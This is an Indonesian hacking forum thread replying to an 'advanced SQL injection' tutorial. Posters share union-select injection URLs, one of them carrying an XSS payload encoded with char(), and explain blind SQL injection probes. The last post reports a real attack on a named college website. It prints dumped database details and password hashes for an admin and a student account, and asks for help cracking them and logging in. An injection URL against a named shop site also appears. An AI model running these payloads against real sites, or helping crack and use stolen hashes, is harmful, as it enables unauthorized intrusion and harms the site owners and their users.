[Tutorial] Advance SQL Injection

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Neo-Gabriel
Posts: 4
Joined: Fri Aug 07, 2009 4:33 pm

Re: [Tutorial] Advance SQL Injection

Post by Neo-Gabriel » Thu May 20, 2010 4:48 pm

Nambahin dikit yah kak Satya :love:
XFS (XSS on SQLinjection)
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,char(ASCII_CODE),4,5--
ex:
alert: <script>alert('gabriel')</script>
ASCII: 60 115 99 114 105 112 116 62 97 108 101 114 116 40 39 103 97 98 114 105 101 108 39 41 60 47 115 99 114 105 112 116 62

POC:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,103,97,98,114,105,101,108,39,41,60,47,115,99,114,105,),4,5--

sorry I'm still n00b :mati:
In the name of Allah. the most gracious, the most merciful..
http://neo-gabriel.uni.cc/v1/ ~ gabriel site's

User avatar
^Nd3s0^
Posts: 96
Joined: Tue Nov 25, 2008 7:01 am
Location: Lereng Argopuro
Contact:

Re: [Tutorial] Advance SQL Injection

Post by ^Nd3s0^ » Sun May 23, 2010 1:49 pm

mantap master satya.....
coba dulu ah....
Tuhan bersama orang-orang yang berani
my blog=http://nd3s0newbie.blogspot.com
Image

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Tutorial] Advance SQL Injection

Post by shinichi81 » Wed May 26, 2010 9:57 am

ikut nambahin bos...........

http://www.chrysantflorist.com/?module= ... 11,12,13--

wat belajar..........
............make a wish............

User avatar
p4njul^th3^3xpl0r3r
Posts: 7
Joined: Wed May 26, 2010 3:26 pm

Re: [Tutorial] Advance SQL Injection

Post by p4njul^th3^3xpl0r3r » Wed May 26, 2010 4:08 pm

Mhn maap neh Om, bukannya gak menghargai hasil karyax, perasaan yg dibahas itu malah Basic SQL Injection dueh... :putusasa:
Maap2x kate neh ya Om, soalnya teknik yg dipaparkan sdh umum di pasaran... :maaf:
Menurut pemahaman sy sebagai org awam, yg namanya Advance Technique dapat memecahkan permasalahan yg sangat sulit, yg tdk dapat diselesaikan dgn teknik SQLi biasa.
Sebagai contoh, SQLi pada MySQL Ver.4, Blind SQLi dan bbrp lg yg lain.
Oh ya, bkn bermaksud mo sok yah Om, kebanyakan dari kita ini cmn make ilmu yg instan2 aje :putusasa:
Cmn tau doank tp kagak paham ujung pangkalnya :putusasa:
Neh sy kasih sebuah pertanyaan, klo jawaban Anda dapat memuaskan sy bakal sy kasih 4 jempol deh dan sy akui Anda sdh sampe pd tahap Advance pengetahuannya ttg SQLi.

Jelaskan penyebab terjadinya Blind SQLi ?
Microsoft Windows is everything for me, how about you...???

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Tutorial] Advance SQL Injection

Post by shinichi81 » Wed May 26, 2010 4:37 pm

sebelum ngejawab pertanyaan itu paling kita tengok dulu Perbedaan SQLinjection dan Blind SQL injection :

SQLinjection adalah metode hacking yang memungkinkan seorang Hacker mengakses isi dari database server Smile
seorang attacker biasanya melakukan pentest dengan memberikan masukan agar database server memberikan SQL query yang tidak valid (error), dengan munculnya pesan error si attacker akan mempelajari pesan error tersebut sehingga mendapatkan inforamsi2 yang lebih untuk melakukan tahapan pentest berikutnya, jika sebuah web tidak menimbulkan pesan error bukan berarti web tersebut bebas dari vuln SQL iinjection, tetapi masih mungkin terkena Blind SQL injection

mendeteksi Blind SQL injection
sudah pasti sebuah aplikasi web menggunakan SQL query untuk mengambil data dari database server, dan biasanya menggunaka kalusa WHERE pada bagian-bagian tertentu

http://www.korban.com/berita.php?id_berita=5

pernyataan SQL di atas kurang lebih begini

SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5

dalam keadaan normal maka server akan mengirmkan kembali hasil pengambilan data dari server tanpa error, untuk menetukan apakah itu vuln terhadap Blind SQLinjection attacker akan melakukan injection pada kalusa WHERE misalnya

http://www.korban.com/berita.php?id_berita=5 AND 1=1

maka database server akan melakukan perintah

SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5 AND 1=1

jika tidak ada pesan error atau tampilan web persis seperti semula maka masih mungkin terkena Blin SQL injection Smile , karena jika tu web aman maka seharusnya perintah SQL itu ndak di jalanin, kemudian si attacker akan menguji untuk memastikan vuln terhadap Blind SQL injection apa tidak dengan memberikan perintah SQL berupa keadaan false Smile

http://www.korban.com/berita.php?id_berita=5 AND 1=2

maka database server akan mengeksekusi perintah

SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5 AND 1=2

ini akan menyebab error tipe karena pada dasarnya memang 1 tidak sama dengan 2 Smile dan pada halaman web tidak akan di tampilkan berita yang dicari alias halama kosong tetapi tidak ada pesan error yang muncul :love: untuk exploitasi selanjutnya ya tidak jauh berbeda dengan SQL injection standar hanya awalnya saja yang berbeda. :love: kemungkinan pembuat website-nya lebih mengutamakan security-nya

semoga membantu ya :kaca: :kaca: :kaca:
............make a wish............

User avatar
p4njul^th3^3xpl0r3r
Posts: 7
Joined: Wed May 26, 2010 3:26 pm

Re: [Tutorial] Advance SQL Injection

Post by p4njul^th3^3xpl0r3r » Wed May 26, 2010 4:58 pm

tidak ada pesan error yang muncul
Maaf Om, mgkn lebih tepatnya, hasil query pada saat melakukan SQLi tidak dimunculkan, dan sebenarnya ciri2 Vuln SQLi baik pada SQLi biasa dan Blind SQLi itu sama kayaknya, yg membedakan keduanya pada saat akan memunculkan hasil query, please CMIIW...

Ref:
http://en.wikipedia.org/wiki/SQL_inject ... _injection

Ok, sampe di penjelasan itu sy paham, itulah yg membedakan antara SQLi Biasa dan Blind SQLi, dimana pada Blind SQLi hasil query tdk dimunculkan, sehingga satu2nya cara hanya membandingkan data yg kita masukkan dgn data yg ada pada database. jika hasilnya TRUE, berarti data yg kita masukkan ada pada database, demikian sebaliknya.

Tp pertanyaan inti sy blom terjawab Om, Apa yg menyebabkan sehingga hasil Query tidak dimunculkan, sehingga perlu menggunakan teknik Blind SQLi...???
Microsoft Windows is everything for me, how about you...???

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Tutorial] Advance SQL Injection

Post by shinichi81 » Wed May 26, 2010 6:26 pm

aku cobain wat jelasinn dulu bos,moga aja berkenan penjelasannya :

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda
dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah
value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value
apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan
value tersebut / menguji true atau falsenya value tersebut,jadi secara kasarnya kalau blind SQL posisi :
statement := “SELECT * FROM users WHERE name = ‘” + userName + “‘;” ---> posisi statment disamarkan sehingga kita tidak bisa mengetahui apakah terjadi kesalahan atau tidak,sehingga hanya memunculkan website yang blank saja....

So,apa yang menyebabkan terjadinya Blind Sql cuman satu jawabannya kalau menurut ane....posisi websitenya tetap menunjukan posisi error dengan cara seperti menunjukan posisi website yang blank atau tidak ada gambar sama sekali,tetapi posisi Query atau statmen yang menunjukan posisi error dipindahkan ke halaman website yang lain

maksudnya,ketika kita mencoba melakukan Inject ke web tersebut untuk memcari vuln dengan tanda ' atau - posisi web tidak menunjukan kesalahan error apapun...tetapi ketika kita mengetikan Query -->
[site]/index.php?id=2AND+1=1 dll ...baru bisa terjawab



Bos,maap bahasanya masih rancu soalnya ane masih cupu :devil :devil :devil :devil
............make a wish............

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: [Tutorial] Advance SQL Injection

Post by 3xtr3m3b0y » Thu May 27, 2010 4:10 am

p4njul^th3^3xpl0r3r wrote:Apa yg menyebabkan sehingga hasil Query tidak dimunculkan, sehingga perlu menggunakan teknik Blind SQLi...???
Mgkn salah satu penyebabnya karena melakukan Filter SQLi yg kurang tepat, ex:

Code: Select all

if (preg_match("/union select/", $id) or preg_match("/union all select/",$id)){echo "Awas ada yg pengen nginjek Omz...!"; exit;}
Mhn teman XCoder yg lain bisa menambahkan...
...n0 l1m17...

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Tutorial] Advance SQL Injection

Post by shinichi81 » Thu May 27, 2010 7:32 am

asikk bertambah lagi nih ilmunya.....ayo siapa lagi yang mau share :love: :love: :love:
............make a wish............

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: [Tutorial] Advance SQL Injection

Post by peniru » Sat May 29, 2010 12:57 pm

nambah atu...

URL:http://www.stmikpontianak.ac.id/news.ph ... ,6,7,8,9--
[+] Gathering MySQL Server Configuration...
Database: stmik
User: stmik@localhost
Version: 4.1.22
[+] Dumping data from database "stmik" Table "password"
[+] Column(s) ['user', 'password', 'id']
[+] Number of Rows: 8
salah satu hasilna...

ADMKETUA:"4c28d6c562063fd5" <-- sayang ane gag taw ni di encrypt pake algo apa yah..... :mati: :mati:

tabel penting lainnya...
[+] Dumping data from database "stmik" Table "login"
[+] Column(s) ['nim', 'password']
[+] Number of Rows: 1486
salah satu hasilnya...

[1] 19941000575:ce9e7830bf9827340bcceaaf3e8e183a <-- berhasil di encrypt but dak bisa login... :mati: :mati:

login page :

Code: Select all

http://www.stmikpontianak.ac.id/user.login.php
mohon pencerahannya
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

Post Reply

Return to “Web Hacking”